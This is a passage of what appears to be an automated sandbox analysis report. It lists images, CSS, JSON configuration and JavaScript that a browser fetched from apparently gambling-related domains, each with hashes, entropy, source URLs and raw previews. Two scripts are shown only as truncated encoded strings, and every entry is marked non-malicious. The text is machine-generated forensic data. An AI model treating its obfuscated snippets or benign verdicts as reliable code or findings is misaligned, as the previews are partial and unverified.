                                                                                                                                                          SHA1:6B678C654646AD09BC50123C65B5381D5DFE9308
                                                                                                                                                          SHA-256:EA4C2ADE86A3DF6D7A93A2DD476F3350EA55AECA91B61BC26DDCD6255BCB0648
                                                                                                                                                          SHA-512:4AD1C05DC20694D0122E2F215F4588FF51E44B3CDAFB32FE254B7A27EC450223C53F1ED0E801485693C6376104398771CBDF4F8F1040999997657CF73B59C845
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_ob.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmpMM:DocumentID="xmp.did:DC7D39D8C3B311EDA074BD41EF2EC0E1" xmpMM:InstanceID="xmp.iid:6d771622-cc10-4a3f-b90e-7367d3881412" xmpMM:OriginalDocumentID="xmp.did:DC7D39D8C3B311EDA074BD41EF2EC0E1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmp:CreateDate="2023-03-16T12:35:53+08:00" xmp:ModifyDate="2023-09-22T14:09:06+08:00" xmp:MetadataDa
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1790
                                                                                                                                                          Entropy (8bit):7.307374017523416
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:v1hfvWwjx82lY2T3JVmlYFyJ3Vxg6qGWSIQhMuaZkZU1RfVSvwFodooEKlYBN:9ANn2NKJ3uvHQhMvKafVSvTd5SN
                                                                                                                                                          MD5:C3E71250956222392386AB8FDA9F580C
                                                                                                                                                          SHA1:00032E091D7B225679E1927214015F027B800E9A
                                                                                                                                                          SHA-256:318D082FE1A07D9BA724D91658AD81014BDEFC1A86984973307DF78C785E80E3
                                                                                                                                                          SHA-512:0F4BAD0D62198F4D18F434E43369909510B2AA135220F0B740EFF8A6BFA6FEE74B28EA9E9AAB8715D6DEC68C550E6B8BD713477969D395D9701403BF0BD75032
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............JL.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:60F6A48B50A211E788319590AF0345A4" xmpMM:DocumentID="xmp.did:60F6A48C50A211E788319590AF0345A4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:60F6A48950A211E788319590AF0345A4" stRef:documentID="xmp.did:60F6A48A50A211E788319590AF0345A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.*....nIDATx..]H.Q..ggGw,.-.z(3J.2!.R.......B......*.._....J).........!JM.D..,.....pg..g;..63.v..;.|.;.;....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 394 x 713, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):97993
                                                                                                                                                          Entropy (8bit):7.987363689432516
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:1We4mMo1RHFVNUO12IlnN8L5fDnWGiptsZ4fyWcC+Wv1H5de9RoEKZy6OlW1YNIW:1tioHHFVNtFNWVLnOpFfF+adeoEAJ1Kb
                                                                                                                                                          MD5:A531D9AF13969A54A89F6C67E5F441CE
                                                                                                                                                          SHA1:A886B417B679A9AFF24FE3511FEAD468C0EA51A6
                                                                                                                                                          SHA-256:58AB92E35ECC9A70FE742FA3E9668AFA662BDD86587407DD5BCC6F66B06A4576
                                                                                                                                                          SHA-512:8662EA94651500A39D708F0D6D2C25C7D346CBE58753CCB8E43F521D7B9DBF2A2F5C2677730C988C5E807F7539C2AB850BECE5D75224FEE42C928883F22B2451
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/app/06.png
                                                                                                                                                          Preview:.PNG........IHDR................}....PLTE...@DB7;9263373&,(384.$..#.....".....4*......$)$..................6=7+/+............HIG.........................mikplb.................................................................................................................................................spx............omr...~..jin...wu{.......v|.............{......*$..........{....{|...acg..............{u...........................................v.............mt....bk~.....................S\aqbiuc\..z......[Q7.}....!.....dX@......|hc......'A8i[^QM1|jo...{e...Uau...............PUTB@:....mg...u^.....5KDIHI......mz./23.sq. .....oqcP......yt>TR}hP.....nW_RRm`E.........~|...h[P...95$WKE..v7@P.s./;Cw{q.........~kJ?*BKb...............2?.G<K...<>x..Jl.9Y..Ziw.j....+tRNS.....1).B7Kk.Tw....m"\?b.&..;..e..^.......K..{MIDATx...o.@...B..,..*....nM..V.T...@.OH....e....SUu@..."!eDBL..{...#.w...EjR..w.:ij......]8C-^.~g.v.q5.H..BA.5......]X..t..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 29 x 16
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1818
                                                                                                                                                          Entropy (8bit):7.248458028824761
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:rBf3rlmUY2vX9+XVff2GHmiMJ+tID61tCaA:rBfbEUY2MVfeGzMJ+uDcw
                                                                                                                                                          MD5:CA0DE4B71304AB21825549ECD5D7F60C
                                                                                                                                                          SHA1:0FFBADB83B7D392F1252F0758BD385DB0C5478BF
                                                                                                                                                          SHA-256:1E089BE0590E34B5911C2175CD3BF1C9CD04353E87234FB2E1F35DC37E982214
                                                                                                                                                          SHA-512:AC63802342C41D502647C4C82D5D2911D64AB2D74F3D55377EBC142CD30406AFE1337C2B7DACA3B350DC02F53E52AC2A03F76A5CE4B6D4B612A32C35739A254A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/top/icon_hot.gif
                                                                                                                                                          Preview:GIF89a.......................................f..p..o..n..k.}i...<..;..:..8..8..8..3..1..,..*..)..*.. .. ......}..L..K..E..0../..&..............................~..v..r..r..q..^..]..\..Z.}Y..`$._#.^#.^!.]!.]!.Y..X..T..R..R..Q..G..F..F..D.}C.L1.K1.E...00.0/./../-./-./-..(..&.,!.,..,..+..(..(..(..(.}(.L .K .E..0../..........................................~..|..x.}v.L<.K;.E7.0#./#.&........!..NETSCAPE2.0.....!.......,..........o@...H..R.9....rJE...Ku...@..R.*.%.s.....x.....8.....Juzdwyt.{.G.Y.\^PR.TWBD..IMO.#G.%....B!..(.....*..."..A.!.......,..........q...e\VQ.....\f..cR....c.~U...~_......Q...]X.........................X]..^..~......T....b....`QW}...ZY.......!.......,..........s...{H@=.....H|..O>....O.A...A.J......=...KD.........................DK..I..........B....N.AP...L=C...FE..M...!.......,..........p...7/,.....7..y-....y.1...1.:......,...93.........................39..8.........50.....1z...;,2...64..<...!.......,..........\.$..`.h.....j,..l......3@ (D
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (6260), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6260
                                                                                                                                                          Entropy (8bit):5.903209562814178
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VPFuiHTwF6+ZHxMfYwlyOsJ/W7zP2yFlotJld1fWfDOSrtlFE6UCUX:VPFuiIZcYwlyOW/ur2yFlslaDOSPFED
                                                                                                                                                          MD5:F97103A4E49E2DC3AC750F0BCD5E8585
                                                                                                                                                          SHA1:EF0F6667DF298CFCAA6FA7A9A3422DC68A267372
                                                                                                                                                          SHA-256:9305BF3B584F127FD32799A428A676097D1C7768888B1B44EE167C03DEAF53AA
                                                                                                                                                          SHA-512:1DB8F2417C5590B93BD7DD84C522B1D4BAB4B75C56B12D3965C326EBE9FC31CE02C23F71646402B17B8D60C6C1CDDF12F6423A4B722D3BA035BD05EF4288C686
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/live800-cs.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgBZ8BdAGgG8AiATgFYBFAVyoC4AzJtGAFwEt0mEGR4BKCgDcoAJwAEaMtIDcaALxUAggCEAwgBEAogDEA4gAkAkggDSAGQCyAOQDyABQYAlAMoAVAKoAagDqABoAmgBaUGAwACYg7ADmABZ8AFZwADYAtmgoEACO0kg8TBLAAB4AngBeAAy4AExEdABsAOwAHDQA1AD0VIqqFNIoPJkcXLwCaEIi4tIgpdJosiAAPOs8AD4gAHwH+I0AtDwAvopj0pPc/ILCYiNLTCtrm0enuwd752QgaLE+FA0DdpvdxHx2EIAHQwdAlaRMXgoaSqVSOJjZMAgaSiRbLVa4Dq4XA0fB0ABk0mho3Gc06om2hEaXUadDo+FadSpNLGmTmjUIoiU7BRmCkch4qjqSh46xA0My/0SPGSsp6PVEIGwPBIqmp/0BwKEOpIwvxL1WIAu0mBsRQ2S0VR4ICQoLusxA4lF0nFMlkUuwJCU+xlIGOx1EPGhECYSGSmHsUFV0PYmRQYrZrQAVEmU7aAQ7MKIS0oLa9fmBna6fCggijYm7OLcZkJvWKJQHVEGyGo6kMZWh5YrlaqVBrFD1VAyeNhpN86CRtqptWgSJtBcdpABSI5l54Vi7ABtIWtOl1NqYetsUH1+yXd8h9lTrI7ZhVKtAqtVoKczmNxgmq4LiQ3ybmgu6NBSbJ0OaB6rJW1anigZggBU7qtl6t4dv6gZPtKL4fqOP4alGAHxpgJprt8QrQjwKBeDw0h8F+mBEiWIjkQmbGUquZp0QxTEsYkbGtKW5YIdCaQoCxmBUFQogXMkaFnkhGHgthvqdnhvYEUORFfmOv6qI0ZGxhR0DFCAFhoDwMJIEwYAIpgCimWQ7FwQSAYXFWF5nlASAgK0hDqZ67Zabhj4DmWw6ft+ZZTvgoh3p2KArnO67rESuxzj0uCZZ0OXSD0jTkHwBF8OshBKHwpG
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):40880
                                                                                                                                                          Entropy (8bit):7.98537476935507
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:U1OPRO+Tc3AWqo9971nh8FlXt+Ygh/IO2ZnM6+IutGgjP10EcUpXwUjCek1:UoPI+owDssy18nMpP27UxT+ek1
                                                                                                                                                          MD5:DA5E9E5D118322052D73D03CF64CDCFE
                                                                                                                                                          SHA1:3CEF17F8EED4CCA0D106628D2A6CA3BF15453B3E
                                                                                                                                                          SHA-256:ECB641652E68070F7227B082024D72F6EF1D6EEB5E8E92B4DEEEA578F2A1825D
                                                                                                                                                          SHA-512:75DC60BD2A855D7CFE62B37950793FD90C201E5942319F362F2CC7D1B64FC81A65235622AA4C8040601B60FD03C433A2FA3F7CE4249D3A4B02DC0B52D742E1E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/casino/05.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...u.%.y....)........F.-...Qf.8.l8..7.M6.d...c;..I.E#..0.4..K......3...w.....}j>..uOU=....=......6....^........|7F.S.........1...)....O....&5...<..M.z...W..y.m...!H....f.?., 1 b.c8z.3V.4V.Q..O#f...-._......@. *TN..3z.N...cw`....5..~...U/m.`@'...V.......O..I....!~.....b..7.+_.@c..T..%....X.....W...k..Uo.W.$ Z...b.t.D",..... .....Q-.r."[.K....:A....4AW....D.g...:.?5.3.^t....l.m).../..z.u.{>...X.gN..=.........3.l}...}..d?...,.....4.....a9../,.w.....n.D....A$@;........$....c.>...#.[.Y.......R...X.(...$..[.......D.N...ZR.,l....C.Z..`%.'Vv6..0.8>..ZR.......>.^ ..o.>I..|..\..._........B..l..3A]....!1.....L4.h.$b.A..&.E...Jp..{}.k...u....J..,A...X<....R.4.....`z.6 ..E..p.U......._..o.....|.6".)..:..U..ny.....PX/.|......E.A..j.r.A[`[...n].\x'.~pF....Z.........G......m....T.%.d..+.~...e......eQ......R.{........*.L......E......b.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://yh8613.cc/favicon.ico
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (8744), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8744
                                                                                                                                                          Entropy (8bit):5.932552425919391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VFygi0OSf6QzoU31aBkZ/720B21KzMpFEvtlAPNcSebQJhw25dB5Vt:VFygn6QzFgBkh7ZU1VUolcSe07HVl
                                                                                                                                                          MD5:829F0DF1F1036894C109D14213723407
                                                                                                                                                          SHA1:4BD0CECAB8B5CFF27AD12AD2F55961BDC2E67C1F
                                                                                                                                                          SHA-256:BE5099A447276D5C307D9EBB5C22472B55023D58C352D87E3D26DA75681BA0EF
                                                                                                                                                          SHA-512:EB03E1D1E1AF89C1ED54F45FC82C08926CCC59F0FAADB19B951C34AA8E6A3F82C2D52BC8CBCD159FFCABD1126E52C143F8C2596FC23390E442B4B98C1C3BF17B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/news.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgE4BdAGgG8AhEAFwBkAuAMwFc0YaBLdTJUmgJTkAvqRiUAapWZsO3NL36k0QgEQskIAARIaAJ04dVAbgDyYAFYgOAOgAmIJpzQgACnpQQQemgE9MNKSqAPrBIEgAsih2LAA2IKoUAG5QsSwgDACEAAzCAsYpelogALwKqgC2SQASAIqqAqScZTYKII0oZZiqACJ2+MANpMAtCiiNel2q2ZyuABZDUKOYeo0wUz0sAPS4Q7FTAHIAmgAepkMsU9kwEExDEFNbSQDiACxDc8sQjXYlmMCYASYESkcxWDiYWI2CpQCARFg0KBcdBIIHkTQ0CJIADmDBgNmeeQoEE8LAgBxAwCQMnYyIUQk4TEwmWAzjsKGArUpSFcpO+5EKOhKNDmnCQXKpAEk0EwULyIGTjIzMNlMiVxfE0NiRUJBTQSuQKjiAMpzDlZbKkI3YgAqnBo8QYIrF0JxdodICtOMo0V8DD41oAwrEoEhqaoXFT5YkkGbgHRHDQKVS6GKaBbSCSFRAAGIh3GqI6qYTGVlodmcyM8vklHL8UXijFY7EBATCdukWMc5PU1i0+S8XVQIr67DEYzO8VV6Wy6GwzB9uQ8FTkPS0Fh6NBaNA2LNkvNQbEldUAMhPNF3GjmwK4HoYO9v8TE6BoIDQ6Z3MBfb8CumHNDtCoMh3P8fEAkAiVUYt8kFNADWtU1zTra13UdSdXVte0n2tH07D9X84wTJgk25VNdAzPdc3zf0S3QpscUwFRRAcL8HGqGgKliGklwUVEBWHLR9XZGAWCA98bBgNckRAABReIxJoboeklCQGmMNcaA3LcL2cFw9GqG0IjodV+BsV8ThoQNv3fAAfGydLQPSbRACzRBgWIUE0HtuLpQFyHQsVEJGTIAEZRGxWgexnFAfIHIciiQYUGyVJkAqQOgUGxZwzxYexHCgOILwAVS4KExUoEM0DgAIGxsDysrQ
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3578
                                                                                                                                                          Entropy (8bit):5.107955736247811
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:G/i9PzJ+vx/GZ0V2f3CjefA6w2c6PY403gdxz11cf:GYPzJs2fSjCA6w2HPY403gdv1cf
                                                                                                                                                          MD5:11AA24B0D5F56402A6C30036FC40CE55
                                                                                                                                                          SHA1:E1919E5B5C58817D1FBA74DC26C3AC8A87C44D7C
                                                                                                                                                          SHA-256:E6AD49E7A361F5332BDAFA9F3C227761AE571A0C1D6010D5A809626C70F19312
                                                                                                                                                          SHA-512:9FAD39556B5094BAABFD86214B6A3E6DEDB20B4BA9199E25C01A668DF511DE3B76979A5F87C3F7391DDD1F7562215190EC2EBB8CAAFA424F954D2F59AE20A6A9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aws.bakeddove.com/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=43370d.top&withAgentCode=1&withSettings=1&terminal=1&ts=17972883054778
                                                                                                                                                          Preview:{"analyticsCode":"","domainType":1,"agentCode":"92829052909","snType":1,"iconRel":"","paymentType":1,"h5AppLayerFlag":1,"zone":"KR,JP,PH,ID,TH,VN,KH,MY,MYA,IND,OTH","sn":"kp08","firstPageFlag":1,"forwardUrl":null,"isZone":true,"settings":{"smsLoginFlag":0,"thirdpartyTransferOutLowerThreshold":0,"payChargeFlag":1,"qqPayTag":2,"agentRebateFlag":1,"internChargeFlag":1,"defaultAgentCodeFlag":0,"qqPayTagFlag":0,"auditWithdrawFlag":1,"subTranferToUpFlag":0,"jdPayIndex":0,"alipaySort":"3","iosCertificate":"","phoneCallback":1,"videoProfitDayThreshold":300000,"wechatPayTag":2,"liveChessForbid":0,"qqpayChargeFlag":1,"jdPayTagFlag":0,"internPayTag":2,"userEditFlag":1,"bgChargeFlag":0,"regCaptchaType":"normal","bankBindOption":2,"abandonCouponFlag":1,"wyPayTagFlag":0,"openAutoDrawFlat":2,"transferPaySort":"1","onlineChargeMemoRequire":0,"openUserNameFlat":0,"loginIdRuleType":"1,2,3","openUserFeeFlat":1,"bdPayIndex":0,"openUserPointFlat":0,"usdtWalletFlag":0,"virtualDrawFlag":1,"unionQrSort":"6","
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 53129
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):11735
                                                                                                                                                          Entropy (8bit):7.9828879074241135
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:b5ks69iM4x3/f3yg+msOUtdTeklUwMawF5T5SKa6Y78UBJutSdq+iRPOuRjko:b5aiNx3ig+msFlUpT5SKa69USt4qrjko
                                                                                                                                                          MD5:0F78991D7D4F9CDF92DE3A719D156EEC
                                                                                                                                                          SHA1:11F84E648C4CBBFBC105E9A52835DF759FD21A1E
                                                                                                                                                          SHA-256:1FF29532EE3A054DA00A22A420CAC36B73CB43236C090A0A40E18CA75EF76858
                                                                                                                                                          SHA-512:7C0843264E86974FF642F13481344AF1F87B9D552AD9BED04DA9A2D3F270A93F28E4F3DD5D69E7AC8C62DC5EFF66F4A67E5D3705CF0683287DD9DA414E905AA7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/content.css
                                                                                                                                                          Preview:...........}io..._.{0.i[..:$<a.o?x?.......h.x...*..n...wF....,.....F"3#..3..C1...}.LM..p.....n.u...K..x.=...59.c;..).6..sQU...v...#.#...S.....0.....}Q~y......._..=..c1<.......q........J..SY.."...Y...4.c.\....Y..K...o.c.=...om9.c.L..*.K...]$....@e#.........x............V..+U....rA.7JN..}1.d{,:..Kh.|Hj&..G.,.`..-..@{A W~..\..*(..w}...O.5.+3=hy9r...z..b_wI..$..&..zM.S.....=..c.gh.<5...4.G9...T<..vz..X.N.V.}?T...fl..k..z....%..j....s....A.tC.N..~..2.....0.............E.g(..2.]...=tG.....O..8=hDl.E...R..3......-3.nh.z.....0:.....K,....)f..p.-..T....2r&...T.`..54E.w.....P....*.Li.c...W.........<.Eg..:%..M.?..q.@............9=.X.%.H+M.M.w.g.....en7.....-,[..0...lj.q3.V.3..i.,K...&......WZ.#xM..y.2Z...u.E......1p...._..s....}...b;m._......}.=.UU...B1nP.L... ...Ww]{..Q..z...d.....y...../.(..+'f....fk.m..`{.3....~.4...C.j..+.V@W....^Q..^...B.......E...#..x..g{..).......p...,.J...P.....a.h......3.a.%V..........SH2..u...qh.p(5.......l
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1123
                                                                                                                                                          Entropy (8bit):5.493713337336767
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilPEIuhF7i+xRH9/pHBLgIugTIRgeRB/Krfjj:Yv1FLJxwewo9BGNhLgPNgsKz
                                                                                                                                                          MD5:D01102906EF6E32E787C27616CA415E3
                                                                                                                                                          SHA1:A5B7E8CEBC290634EAE62FAADB5FEBD98C85F085
                                                                                                                                                          SHA-256:7D79BCB4E392A105BB7031DCB3BC6FB4EC802B2B235326B66911C150EDC99E23
                                                                                                                                                          SHA-512:97E0997BCFFAD961ADB1407F3B8A78CBD1623E904F7A3F47ACFADB1B98C1ED9D4F7F6163E1FA442491615059C53C067227EF16D338CDD8A5382CC218D4AC65AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":null,"webPath":"t4091","httpsSupport":0,"analyticsJs":"","loginLogo":null,"name":".......","onlineCustomerServiceUrl":"https://hg2.jxxh8.icu/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/ll12/202312/202312180557505.png","snStatus":1,"webTitle":"....","isMaintain":0,"i
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aws.bakeddove.com/ocs/cc.png?1717972843129
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (32034)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):45187
                                                                                                                                                          Entropy (8bit):5.364274258091796
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:oTFZ8CkWyYzh9MTvl7prcAgQW5ppZ+rPPWRqKDyBuq0t:cZiY9uTJuAgQW5LZ+rPPWRLt
                                                                                                                                                          MD5:F15409FB02C527CE1F66A2FD3C4AA0E9
                                                                                                                                                          SHA1:1E1E1BCC0F49E99E14BA34991CFFE0745178D302
                                                                                                                                                          SHA-256:1A1B5D3D6FBFC28ABE37A668ABD59494208C63C5F0B5D040CF4BBBD137F87C27
                                                                                                                                                          SHA-512:66A384D6AD5FBA862E778E24C43326A718328B6F860469FB5EB69C2687B0BBDC3C2DFA9049B0E3D5509214DB1DBEC4477F5C3654DC04446A505379A4300D4908
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/idangerous.swiper.min.js
                                                                                                                                                          Preview:/*. * Swiper 2.7.0. * Mobile touch slider and framework with hardware accelerated transitions. *. * http://www.idangero.us/sliders/swiper/. *. * Copyright 2010-2014, Vladimir Kharlampidi. * The iDangero.us. * http://www.idangero.us/. *. * Licensed under GPL & MIT. *. * Released on: August 30, 2014.*/.var Swiper=function(a,b){"use strict";function c(a,b){return document.querySelectorAll?(b||document).querySelectorAll(a):jQuery(a,b)}function d(a){return"[object Array]"===Object.prototype.toString.apply(a)?!0:!1}function e(){var a=F-I;return b.freeMode&&(a=F-I),b.slidesPerView>C.slides.length&&!b.centeredSlides&&(a=0),0>a&&(a=0),a}function f(){function a(a){var c=new Image;c.onload=function(){"undefined"!=typeof C&&null!==C&&(void 0!==C.imagesLoaded&&C.imagesLoaded++,C.imagesLoaded===C.imagesToLoad.length&&(C.reInit(),b.onImagesReady&&C.fireCallback(b.onImagesReady,C)))},c.src=a||''}var d=C.h.addEventListener,e="wrapper"===b.eventTarget?C.wrapper:C.container;if(C.browser.ie10||C.browser.i
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
